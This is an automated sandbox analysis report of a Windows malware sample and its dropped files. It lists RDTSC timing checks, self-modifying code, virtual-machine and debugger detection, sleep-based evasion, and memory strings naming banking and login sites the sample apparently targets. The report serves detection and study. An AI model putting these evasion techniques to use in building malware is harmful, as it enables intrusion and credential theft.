                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeRDTSC instruction interceptor: First address: F5CA9F second address: F5CAA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeRDTSC instruction interceptor: First address: F64571 second address: F6457E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jnp 00007F36B8869BF6h 0x0000000d rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeRDTSC instruction interceptor: First address: F64E7E second address: F64E84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeRDTSC instruction interceptor: First address: F64E84 second address: F64E88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeRDTSC instruction interceptor: First address: F6C887 second address: F6C88C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeRDTSC instruction interceptor: First address: F6C918 second address: F6C930 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36B8869C00h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeRDTSC instruction interceptor: First address: F6DC43 second address: F6DC4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F36B8D8D086h 0x0000000a rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeRDTSC instruction interceptor: First address: F355C6 second address: F35644 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F36B8869BFAh 0x00000009 pop esi 0x0000000a jmp 00007F36B8869BFAh 0x0000000f push esi 0x00000010 push edx 0x00000011 pop edx 0x00000012 pop esi 0x00000013 jmp 00007F36B8869BFCh 0x00000018 popad 0x00000019 pushad 0x0000001a pushad 0x0000001b jmp 00007F36B8869C05h 0x00000020 jmp 00007F36B8869C01h 0x00000025 jl 00007F36B8869BF6h 0x0000002b push edi 0x0000002c pop edi 0x0000002d popad 0x0000002e jmp 00007F36B8869C09h 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 popad 0x00000037 ja 00007F36B8869BF6h 0x0000003d rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeRDTSC instruction interceptor: First address: F7288A second address: F7288E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeRDTSC instruction interceptor: First address: F7288E second address: F728C5 instructions: 0x00000000 rdtsc 0x00000002 je 00007F36B8869BF6h 0x00000008 jmp 00007F36B8869C03h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jmp 00007F36B8869C02h 0x00000015 jbe 00007F36B8869BF6h 0x0000001b popad 0x0000001c rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeRDTSC instruction interceptor: First address: F74D63 second address: F74D67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeRDTSC instruction interceptor: First address: F74D67 second address: F74D8A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36B8869C00h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c je 00007F36B8869BFCh 0x00000012 jns 00007F36B8869BF6h 0x00000018 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeRDTSC instruction interceptor: First address: F74E2F second address: F74E5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a jmp 00007F36B8D8D08Ah 0x0000000f mov eax, dword ptr [eax] 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F36B8D8D096h 0x00000018 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeRDTSC instruction interceptor: First address: F74E5D second address: F74E63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeRDTSC instruction interceptor: First address: F74E63 second address: F74E82 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36B8D8D090h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f push ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeRDTSC instruction interceptor: First address: F74E82 second address: F74E86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeRDTSC instruction interceptor: First address: F75935 second address: F75939 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeRDTSC instruction interceptor: First address: F75939 second address: F7593D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeRDTSC instruction interceptor: First address: F7599F second address: F759A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeRDTSC instruction interceptor: First address: F75A99 second address: F75A9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeRDTSC instruction interceptor: First address: F75BA3 second address: F75BCB instructions: 0x00000000 rdtsc 0x00000002 jns 00007F36B8D8D086h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F36B8D8D099h 0x00000014 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeRDTSC instruction interceptor: First address: F75F2A second address: F75F34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F36B8869BF6h 0x0000000a rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeRDTSC instruction interceptor: First address: F76051 second address: F7609C instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F36B8D8D088h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push esi 0x00000012 call 00007F36B8D8D088h 0x00000017 pop esi 0x00000018 mov dword ptr [esp+04h], esi 0x0000001c add dword ptr [esp+04h], 0000001Dh 0x00000024 inc esi 0x00000025 push esi 0x00000026 ret 0x00000027 pop esi 0x00000028 ret 0x00000029 mov dword ptr [ebp+12454E57h], esi 0x0000002f xor di, 0664h 0x00000034 push eax 0x00000035 je 00007F36B8D8D090h 0x0000003b pushad 0x0000003c push edi 0x0000003d pop edi 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeRDTSC instruction interceptor: First address: F76670 second address: F76676 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeRDTSC instruction interceptor: First address: F76676 second address: F7667A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeRDTSC instruction interceptor: First address: F7667A second address: F766CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov dword ptr [ebp+122D3596h], esi 0x00000011 push 00000000h 0x00000013 sub edi, 79C1F6FAh 0x00000019 mov edi, dword ptr [ebp+122D3670h] 0x0000001f push 00000000h 0x00000021 push 00000000h 0x00000023 push ebp 0x00000024 call 00007F36B8869BF8h 0x00000029 pop ebp 0x0000002a mov dword ptr [esp+04h], ebp 0x0000002e add dword ptr [esp+04h], 0000001Ch 0x00000036 inc ebp 0x00000037 push ebp 0x00000038 ret 0x00000039 pop ebp 0x0000003a ret 0x0000003b mov esi, dword ptr [ebp+122D36DFh] 0x00000041 xchg eax, ebx 0x00000042 push ebx 0x00000043 push eax 0x00000044 push edx 0x00000045 pushad 0x00000046 popad 0x00000047 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeRDTSC instruction interceptor: First address: F766CB second address: F766CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeRDTSC instruction interceptor: First address: F766CF second address: F766E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F36B8869BFFh 0x00000010 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeRDTSC instruction interceptor: First address: F7708C second address: F770F9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jno 00007F36B8D8D086h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 call 00007F36B8D8D088h 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], ebx 0x0000001a add dword ptr [esp+04h], 0000001Bh 0x00000022 inc ebx 0x00000023 push ebx 0x00000024 ret 0x00000025 pop ebx 0x00000026 ret 0x00000027 mov dword ptr [ebp+122D27B5h], esi 0x0000002d mov dword ptr [ebp+122D27F1h], esi 0x00000033 push 00000000h 0x00000035 or dword ptr [ebp+122D3596h], eax 0x0000003b push 00000000h 0x0000003d jmp 00007F36B8D8D08Ch 0x00000042 xchg eax, ebx 0x00000043 push eax 0x00000044 push edx 0x00000045 jmp 00007F36B8D8D098h 0x0000004a rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeRDTSC instruction interceptor: First address: F78219 second address: F782D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jmp 00007F36B8869C02h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push ebp 0x00000011 call 00007F36B8869BF8h 0x00000016 pop ebp 0x00000017 mov dword ptr [esp+04h], ebp 0x0000001b add dword ptr [esp+04h], 00000014h 0x00000023 inc ebp 0x00000024 push ebp 0x00000025 ret 0x00000026 pop ebp 0x00000027 ret 0x00000028 or edi, dword ptr [ebp+122D2B78h] 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push eax 0x00000033 call 00007F36B8869BF8h 0x00000038 pop eax 0x00000039 mov dword ptr [esp+04h], eax 0x0000003d add dword ptr [esp+04h], 00000018h 0x00000045 inc eax 0x00000046 push eax 0x00000047 ret 0x00000048 pop eax 0x00000049 ret 0x0000004a mov si, di 0x0000004d push 00000000h 0x0000004f call 00007F36B8869C07h 0x00000054 pushad 0x00000055 mov di, 296Eh 0x00000059 popad 0x0000005a pop edi 0x0000005b xchg eax, ebx 0x0000005c jg 00007F36B8869C0Eh 0x00000062 push eax 0x00000063 push eax 0x00000064 push edx 0x00000065 pushad 0x00000066 jbe 00007F36B8869BF6h 0x0000006c jmp 00007F36B8869C01h 0x00000071 popad 0x00000072 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeRDTSC instruction interceptor: First address: F77969 second address: F77976 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jbe 00007F36B8D8D08Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeSpecial instruction interceptor: First address: DE8C8A instructions caused by: Self-modifying code
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeSpecial instruction interceptor: First address: F9089D instructions caused by: Self-modifying code
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeSpecial instruction interceptor: First address: F90520 instructions caused by: Self-modifying code
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeSpecial instruction interceptor: First address: F9AD07 instructions caused by: Self-modifying code
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeSpecial instruction interceptor: First address: 1018BA6 instructions caused by: Self-modifying code
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeSpecial instruction interceptor: First address: DBEB68 instructions caused by: Self-modifying code
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeSpecial instruction interceptor: First address: DBEAA5 instructions caused by: Self-modifying code
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: 7EEB68 instructions caused by: Self-modifying code
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: 7EEAA5 instructions caused by: Self-modifying code
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeCode function: 5_2_05430112 rdtsc 5_2_05430112
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread delayed: delay time: 180000Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 499Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 541Jump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe TID: 4208Thread sleep time: -210000s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5356Thread sleep count: 66 > 30Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5356Thread sleep time: -132066s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5588Thread sleep count: 58 > 30Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5588Thread sleep time: -116058s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2656Thread sleep count: 499 > 30Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2656Thread sleep time: -14970000s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5700Thread sleep time: -180000s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6248Thread sleep count: 541 > 30Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6248Thread sleep time: -1082541s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread delayed: delay time: 30000Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread delayed: delay time: 180000Jump to behavior
                        Source: skotes.exe, skotes.exe, 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                        Source: Dl6wuWiQdg.exe, 00000000.00000003.2175186478.000000000540C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                        Source: Dl6wuWiQdg.exe, 00000000.00000002.2303431239.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2208865107.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2199166936.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2214091045.00000000007B5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWSu
                        Source: Dl6wuWiQdg.exe, 00000000.00000003.2175186478.000000000540C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                        Source: Dl6wuWiQdg.exe, 00000000.00000003.2175186478.000000000540C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
                        Source: Dl6wuWiQdg.exe, 00000000.00000003.2175186478.000000000540C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696487552f
                        Source: Dl6wuWiQdg.exe, 00000000.00000003.2175186478.000000000540C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696487552x
                        Source: Dl6wuWiQdg.exe, 00000000.00000003.2175186478.000000000540C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
                        Source: skotes.exe, 00000009.00000002.3374357149.0000000001687000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%
                        Source: Dl6wuWiQdg.exe, 00000000.00000002.2303431239.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000002.2303431239.0000000000777000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2208865107.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2199166936.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2214091045.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000002.3374357149.0000000001687000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000002.3374357149.0000000001659000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000003.3209003950.0000000001687000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                        Source: Dl6wuWiQdg.exe, 00000000.00000003.2175186478.000000000540C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696487552
                        Source: Dl6wuWiQdg.exe, 00000000.00000003.2175186478.000000000540C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                        Source: Dl6wuWiQdg.exe, 00000000.00000003.2175186478.0000000005411000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696487552p
                        Source: Dl6wuWiQdg.exe, 00000000.00000003.2175186478.000000000540C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                        Source: Dl6wuWiQdg.exe, 00000000.00000003.2175186478.000000000540C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696487552
                        Source: Dl6wuWiQdg.exe, 00000000.00000003.2175186478.000000000540C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696487552o
                        Source: skotes.exe, 00000009.00000003.3209003950.0000000001687000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW,
                        Source: Dl6wuWiQdg.exe, 00000000.00000003.2175186478.000000000540C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696487552
                        Source: Dl6wuWiQdg.exe, 00000000.00000003.2175186478.000000000540C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
                        Source: Dl6wuWiQdg.exe, 00000000.00000003.2175186478.000000000540C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696487552
                        Source: Dl6wuWiQdg.exe, 00000000.00000003.2175186478.000000000540C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696487552j
                        Source: Dl6wuWiQdg.exe, 00000000.00000003.2175186478.000000000540C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
                        Source: Dl6wuWiQdg.exe, 00000000.00000003.2175186478.000000000540C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                        Source: Dl6wuWiQdg.exe, 00000000.00000003.2175186478.000000000540C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
                        Source: Dl6wuWiQdg.exe, 00000000.00000003.2175186478.000000000540C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                        Source: Dl6wuWiQdg.exe, 00000000.00000002.2304850960.0000000000F71000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: vmci<@
                        Source: Dl6wuWiQdg.exe, 00000000.00000003.2175186478.000000000540C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                        Source: Dl6wuWiQdg.exe, 00000000.00000003.2175186478.000000000540C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                        Source: Dl6wuWiQdg.exe, 00000000.00000003.2175186478.000000000540C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696487552t
                        Source: Dl6wuWiQdg.exe, 00000000.00000003.2175186478.000000000540C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                        Source: Dl6wuWiQdg.exe, 00000000.00000003.2175186478.000000000540C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                        Source: Dl6wuWiQdg.exe, 00000000.00000003.2175186478.000000000540C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                        Source: Dl6wuWiQdg.exe, 00000000.00000003.2175186478.000000000540C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696487552s
                        Source: Dl6wuWiQdg.exe, 00000000.00000003.2175186478.000000000540C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                        Source: Dl6wuWiQdg.exe, 00000000.00000003.2175186478.000000000540C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696487552t
                        Source: Dl6wuWiQdg.exe, 00000000.00000003.2175186478.000000000540C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
                        Source: 8WYS1MQTL0QCOHKIPL8.exe, 00000005.00000003.2326045034.000000000185E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}[
                        Source: Dl6wuWiQdg.exe, 00000000.00000002.2304850960.0000000000F71000.00000040.00000001.01000000.00000003.sdmp, 8WYS1MQTL0QCOHKIPL8.exe, 00000005.00000002.2359545297.0000000000F4C000.00000040.00000001.01000000.00000006.sdmp, skotes.exe, 00000006.00000002.2397857006.000000000097C000.00000040.00000001.01000000.00000008.sdmp, skotes.exe, 00000007.00000002.2398032734.000000000097C000.00000040.00000001.01000000.00000008.sdmp, skotes.exe, 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                        Source: Dl6wuWiQdg.exe, 00000000.00000003.2175186478.000000000540C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
                        Source: Dl6wuWiQdg.exe, 00000000.00000003.2175186478.000000000540C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeSystem information queried: ModuleInformationJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeProcess information queried: ProcessInformationJump to behavior

                        Anti Debugging

                        barindex
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeThread information set: HideFromDebuggerJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeThread information set: HideFromDebuggerJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebuggerJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebuggerJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebuggerJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeCode function: 5_2_05430A45 Start: 05430B08 End: 05430AAF5_2_05430A45
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeOpen window title or class name: regmonclass
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeOpen window title or class name: gbdyllo
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeOpen window title or class name: procmon_window_class
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeOpen window title or class name: ollydbg
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeOpen window title or class name: filemonclass
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: NTICE
